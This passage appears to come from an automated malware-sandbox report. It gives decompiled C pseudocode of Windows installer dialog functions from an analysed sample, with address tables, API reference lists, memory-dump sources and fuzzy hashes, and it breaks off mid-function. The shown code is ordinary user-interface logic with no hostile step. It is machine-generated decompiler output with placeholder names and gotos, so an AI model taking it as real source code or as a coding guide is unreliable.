							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404BFF(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42475c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x420d34;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x420d48;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x420d34 = 0;
								 *0x420d48 = 0;
								 *0x4247c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42475d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404C7F();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x420d48;
									_t206 =  *0x424788;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42478c <= 0) {
										L86:
										if( *0x42474c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x423f1c; // 0x74a557
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404BBA(0x3ff, 0xfffffffb, E00404BD2(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42478c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x420d48);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x4247c0 = _a4;
					_v20 = 2;
					 *0x420d48 = GlobalAlloc(0x40,  *0x42478c << 2);
					_t264 = LoadImageA( *0x424740, 0x6e, 0, 0, 0, 0);
					 *0x420d3c =  *0x420d3c | 0xffffffff;
					_v16 = _t264;
					 *0x420d44 = SetWindowLongA(_v8, 0xfffffffc, E004052C3);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x420d34 = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x420d34);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062BB(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004042AC(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004042AC(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42478c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x420d48 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x420d48 + _t329 * 4) = _t290;
									_v16 =  *( *0x420d48 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42478c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004042E1(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004042E1(_v12);
								L93:
								return E00404313(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404ccf
0x00404cd7
0x00404cdf
0x00404ce5
0x00404cfd
0x00404d00
0x00404d01
0x00404f2e
0x00404f35
0x00404f49
0x00404f37
0x00404f39
0x00404f3c
0x00404f3d
0x00404f44
0x00404f44
0x00404f55
0x00404f63
0x00404f66
0x00404f7c
0x00404ff1
0x00404ff4
0x00404ff6
0x00405000
0x0040500e
0x0040500e
0x00405010
0x0040501a
0x00405020
0x00405023
0x00405026
0x00405041
0x00405028
0x00405032
0x00405032
0x00405026
0x0040501a
0x00000000
0x00404ff4
0x00404f81
0x00404f8c
0x00404f91
0x00404f98
0x00404f9d
0x00404fa1
0x00404fac
0x00404fac
0x00404fb0
0x00404fb4
0x00404fb8
0x00404fcb
0x00404fba
0x00404fba
0x00404fc1
0x00404fc7
0x00404fc3
0x00404fc3
0x00404fc3
0x00404fc1
0x00404fcf
0x00404fd1
0x00404fe4
0x00404fe7
0x00404fea
0x00404fea
0x00404fb4
0x00000000
0x00404fa1
0x00404f83
0x00404f8a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405044
0x00405044
0x0040504b
0x004050bc
0x004050c4
0x004050cc
0x004050cc
0x004050d5
0x004050d7
0x004050de
0x004050e1
0x004050e1
0x004050e7
0x004050ee
0x004050f1
0x004050f1
0x004050f7
0x004050fd
0x00405103
0x00405103
0x00405110
0x00405270
0x00405277
0x00405294
0x0040529a
0x004052ac
0x004052ac
0x00000000
0x00405116
0x00405118
0x0040511d
0x00405122
0x00405127
0x00405129
0x00405129
0x0040512a
0x0040512b
0x0040512d
0x0040512d
0x00405135
0x00405176
0x00405178
0x00405188
0x0040518b
0x00405190
0x00405197
0x0040519a
0x0040523c
0x00405244
0x0040524c
0x0040524c
0x00405252
0x0040525a
0x0040526b
0x0040526b
0x00000000
0x0040525a
0x004051a0
0x004051a3
0x004051a9
0x004051ae
0x004051b0
0x004051b2
0x004051b8
0x004051bf
0x004051c4
0x004051cb
0x004051ce
0x004051ce
0x004051d5
0x004051e1
0x004051e5
0x004051e7
0x004051e7
0x004051d7
0x004051d9
0x004051d9
0x00405207
0x00405213
0x00405222
0x00405222
0x00405224
0x00405227
0x00405230
0x00000000
0x00405137
0x00405142
0x00405145
0x0040514a
0x0040514c
0x00405150
0x00405160
0x0040516a
0x0040516c
0x0040516f
0x00000000
0x00000000
0x00000000
0x00000000
0x00405152
0x00405152
0x00405158
0x0040515a
0x0040515a
0x0040515b
0x0040515c
0x00000000
0x00405152
0x00405135
0x00405110
0x00405053
0x00000000
0x00405069
0x00405073
0x00405078
0x00000000
0x00000000
0x0040508a
0x0040508f
0x0040509b
0x0040509b
0x0040509d
0x004050ac
0x004050ae
0x004050b2
0x004050b5
0x00000000
0x004050b5
0x00405053
0x00404d07
0x00404d0a
0x00404d0d
0x00404d1d
0x00404d30
0x00404d3b
0x00404d41
0x00404d4f
0x00404d62
0x00404d67
0x00404d72
0x00404d7b
0x00404d91
0x00404da1
0x00404dad
0x00404dad
0x00404db2
0x00404db8
0x00404dba
0x00404dbd
0x00404dc2
0x00404dc7
0x00404dc9
0x00404dc9
0x00404de9
0x00404de9
0x00404deb
0x00404dec
0x00404df1
0x00404df7
0x00404dfb
0x00404e00
0x00404e08
0x00404e0c
0x00404e11
0x00404e16
0x00404e1e
0x00404e21
0x00404ef0
0x00404f03
0x00000000
0x00404e27
0x00404e2a
0x00404e2d
0x00404e30
0x00404e30
0x00404e35
0x00404e3e
0x00404e41
0x00404e45
0x00404e48
0x00404e4b
0x00404e54
0x00404e5d
0x00404e60
0x00404e63
0x00404e66
0x00404ea4
0x00404ecf
0x00404ea6
0x00404eb5
0x00404eb5
0x00404e68
0x00404e6b
0x00404e79
0x00404e83
0x00404e8b
0x00404e92
0x00404e9d
0x00404e9d
0x00404e66
0x00404ed5
0x00404ed6
0x00404ee2
0x00404ee2
0x00404eee
0x00404f09
0x00404f0c
0x00404f29
0x00000000
0x00404f0e
0x00404f13
0x00404f1c
0x004052ae
0x004052c0
0x004052c0
0x00404f0c
0x00000000
0x00404eee
0x00404e21

APIs

GetDlgItem.USER32 ref: 00404CC8
GetDlgItem.USER32 ref: 00404CD5
GlobalAlloc.KERNEL32(00000040,?), ref: 00404D24
LoadImageA.USER32 ref: 00404D3B
SetWindowLongA.USER32 ref: 00404D55
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D67
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404D7B
SendMessageA.USER32(?,00001109,00000002), ref: 00404D91
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404D9D
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404DAD
DeleteObject.GDI32(00000110), ref: 00404DB2
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404DDD
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404DE9
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404E83
SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404EB3

Part of subcall function 004042E1: SendMessageA.USER32(00000028,?,00000001,00404111), ref: 004042EF

SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EC7
GetWindowLongA.USER32 ref: 00404EF5
SetWindowLongA.USER32 ref: 00404F03
ShowWindow.USER32(?,00000005), ref: 00404F13
SendMessageA.USER32(?,00000419,00000000,?), ref: 0040500E
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00405073
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405088
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 004050AC
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 004050CC
ImageList_Destroy.COMCTL32(?), ref: 004050E1
GlobalFree.KERNEL32 ref: 004050F1
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0040516A
SendMessageA.USER32(?,00001102,?,?), ref: 00405213
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00405222
InvalidateRect.USER32(?,00000000,00000001), ref: 0040524C
ShowWindow.USER32(?,00000000), ref: 0040529A
GetDlgItem.USER32 ref: 004052A5
ShowWindow.USER32(00000000), ref: 004052AC

Strings

N, xrefs: 00404F4C
M, xrefs: 00404E6B
, xrefs: 00405284

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 2a089ffaa6d080d8f9741abd0f9240871e5015f633a6bdd7d3a40dad24a0061c
Instruction ID: 1f2220219548b190c7fc9fe52a988bdfc75827026f4451c66edb8ee187498390
Opcode Fuzzy Hash: 2a089ffaa6d080d8f9741abd0f9240871e5015f633a6bdd7d3a40dad24a0061c
Instruction Fuzzy Hash: 33025DB0A00209AFDB20DF94DD45AAE7BB5FB84354F10817AF610BA2E1C7789D52DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403DD8, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00403DD8(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x420d38 = _t35;
					if(_t116 == 0x110) {
						 *0x424748 = _t126;
						 *0x420d4c = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41fd18 = _t92;
						E004042AC(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x423f28);
						 *0x423f0c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420d38 = 1;
					}
					_t123 =  *0x40a1f8; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x424780;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E004042F8(0x40b);
						while(1) {
							_t37 =  *0x420d38;
							 *0x40a1f8 =  *0x40a1f8 + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1f8; // 0xffffffff
							__eflags = _t39 -  *0x424784;
							if(_t39 ==  *0x424784) {
								E0040140B(1);
							}
							__eflags =  *0x423f0c - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1f8 -  *0x424784; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E004062BB(_t117, _t126, _t131, 0x42c800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042AC(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042AC(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042AC(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x4247ec - _t134;
							_v32 = _t49;
							if( *0x4247ec != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E004042CE(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x41fd18, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x4247ec - _t134;
							if( *0x4247ec == _t134) {
								_push( *0x420d4c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x41fd18);
							}
							E004042E1();
							E00406228(0x420d50, E00403DB9());
							E004062BB(0x420d50, _t126, _t131,  &(0x420d50[lstrlenA(0x420d50)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x420d50);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)), _t134);
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x423f18);
									 *0x420528 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x424740,  *_t131 +  *0x423f20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x423f18 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042AC(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x423f18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									E00401389( *((intOrPtr*)(_t131 + 0xc)), _t134);
									__eflags =  *0x423f0c - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423f18, 8);
									E004042F8(0x405);
									goto L58;
								}
								__eflags =  *0x4247ec - _t134;
								if( *0x4247ec != _t134) {
									goto L61;
								}
								__eflags =  *0x4247e0 - _t134;
								if( *0x4247e0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423f18);
						 *0x424748 = _t134;
						EndDialog(_t126,  *0x420120);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)), 0);
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x423f18, 0x40f, 0, 1);
						__eflags =  *0x423f0c - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x420d30, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420d30,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E00404313(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x423f18, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x4247ec - _t134;
										if( *0x4247ec == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x420120 = 1;
											L21:
											_push(0x78);
											L22:
											E00404285();
											goto L26;
										}
										E0040140B(_t128);
										 *0x420120 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x423f18);
						 *0x423f18 = _a12;
						L58:
						if( *0x421d50 == _t134) {
							_t143 =  *0x423f18 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x421d50 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x00403de1
0x00403dea
0x00403f2b
0x00403f2f
0x00403f33
0x00403f35
0x00403f3a
0x00403f45
0x00403f50
0x00403f55
0x00403f57
0x00403f59
0x00403f5c
0x00403f61
0x00403f6f
0x00403f7c
0x00403f83
0x00403f83
0x00403f84
0x00403f84
0x00403f89
0x00403f8f
0x00403f96
0x00403f9c
0x00403f9e
0x00403fde
0x00403fe3
0x00403fe8
0x00403fe8
0x00403fed
0x00403ff6
0x00403ff8
0x00403ffd
0x00404003
0x00404007
0x00404007
0x0040400c
0x00404012
0x00000000
0x00000000
0x0040401d
0x00404023
0x00000000
0x00000000
0x0040402c
0x00404034
0x00404039
0x0040403c
0x00404042
0x00404047
0x0040404a
0x00404050
0x00404055
0x00404058
0x0040405e
0x00404066
0x0040406c
0x00404072
0x00404076
0x0040407d
0x0040407d
0x0040407d
0x00404087
0x00404099
0x004040a5
0x004040aa
0x004040b4
0x004040ba
0x004040bc
0x004040c1
0x004040be
0x004040be
0x004040be
0x004040d1
0x004040e9
0x004040eb
0x004040f1
0x00404106
0x004040f3
0x004040fc
0x004040fe
0x004040fe
0x0040410c
0x0040411d
0x0040412e
0x00404135
0x0040413f
0x00404144
0x00404146
0x00000000
0x0040414c
0x0040414c
0x0040414e
0x00000000
0x00000000
0x00404154
0x00404158
0x0040417d
0x00404183
0x00404189
0x0040418b
0x00000000
0x00000000
0x004041b1
0x004041b7
0x004041b9
0x004041be
0x00000000
0x00000000
0x004041c4
0x004041c7
0x004041ca
0x004041e1
0x004041ed
0x00404206
0x00404210
0x00404215
0x0040421b
0x00000000
0x00000000
0x00404225
0x00404230
0x00000000
0x00404230
0x0040415a
0x00404160
0x00000000
0x00000000
0x00404166
0x0040416c
0x00000000
0x00000000
0x00000000
0x00404172
0x00404146
0x0040423d
0x00404249
0x00404250
0x00000000
0x00403fa0
0x00403fa0
0x00403fa3
0x00403fd6
0x00403fd6
0x00403fd8
0x00000000
0x00000000
0x00000000
0x00403fd8
0x00403fa9
0x00403fae
0x00403fb0
0x00000000
0x00000000
0x00403fc0
0x00403fc8
0x00000000
0x00403fce
0x00403dfc
0x00403dfc
0x00403e00
0x00403e05
0x00403e14
0x00403e14
0x00403e1d
0x00403e26
0x00403e31
0x00403e31
0x00403e3d
0x00403e59
0x00403e5c
0x00403e6f
0x00403e75
0x00403f18
0x00000000
0x00403f21
0x00403e7b
0x00403e88
0x00403e8a
0x00403e8c
0x00403eab
0x00403eab
0x00403eae
0x00403eb3
0x00403eb6
0x00403ec6
0x00403ec7
0x00403ec9
0x00403eff
0x00403f12
0x00000000
0x00403f12
0x00403ecb
0x00403ed1
0x00403eea
0x00403eef
0x00403ef1
0x00000000
0x00000000
0x00403ef3
0x00403edf
0x00403edf
0x00403ee1
0x00403ee1
0x00000000
0x00403ee1
0x00403ed4
0x00403ed9
0x00000000
0x00403ed9
0x00403eb8
0x00403ebe
0x00000000
0x00000000
0x00403ec0
0x00000000
0x00403ec0
0x00403eb0
0x00000000
0x00403eb0
0x00403e96
0x00403e9d
0x00403ea3
0x00403ea5
0x00000000
0x00000000
0x00000000
0x00403ea5
0x00403e61
0x00000000
0x00403e3f
0x00403e45
0x00403e4f
0x00404256
0x0040425c
0x0040425e
0x00404264
0x00404269
0x0040426f
0x0040426f
0x00404264
0x00404279
0x00000000
0x00404279
0x00403e3d

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E14
ShowWindow.USER32(?), ref: 00403E31
DestroyWindow.USER32 ref: 00403E45
SetWindowLongA.USER32 ref: 00403E61
GetDlgItem.USER32 ref: 00403E82
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403E96
IsWindowEnabled.USER32(00000000), ref: 00403E9D
GetDlgItem.USER32 ref: 00403F4B
GetDlgItem.USER32 ref: 00403F55
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403F6F
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403FC0
GetDlgItem.USER32 ref: 00404066
ShowWindow.USER32(00000000,?), ref: 00404087
EnableWindow.USER32(?,?), ref: 00404099
EnableWindow.USER32(?,?), ref: 004040B4
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040CA
EnableMenuItem.USER32 ref: 004040D1
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 004040E9
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 004040FC
lstrlenA.KERNEL32(00420D50,?,00420D50,00000000), ref: 00404126
SetWindowTextA.USER32(?,00420D50), ref: 00404135
ShowWindow.USER32(?,0000000A), ref: 00404269

Strings

PB, xrefs: 00404116

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: PB
API String ID: 184305955-3196168531
Opcode ID: 7ca70d26d5cdbf7e385cb3433e5eec3c9b526a6c029d08fd08a86bcbe3389ad2
Instruction ID: 6f64ab7c90c2728ca861f65b52108cf4a96aadf8bbc29eaef7369c8c365bd3a4
Opcode Fuzzy Hash: 7ca70d26d5cdbf7e385cb3433e5eec3c9b526a6c029d08fd08a86bcbe3389ad2
Instruction Fuzzy Hash: F2C1C2B1A00300BFDB216F61EE45D2B3AB8EB85746F41053EF641B51F1CB3999829B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00404417, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404417(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x41fd1c =  *0x41fd1c + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00404313(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x4236e0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
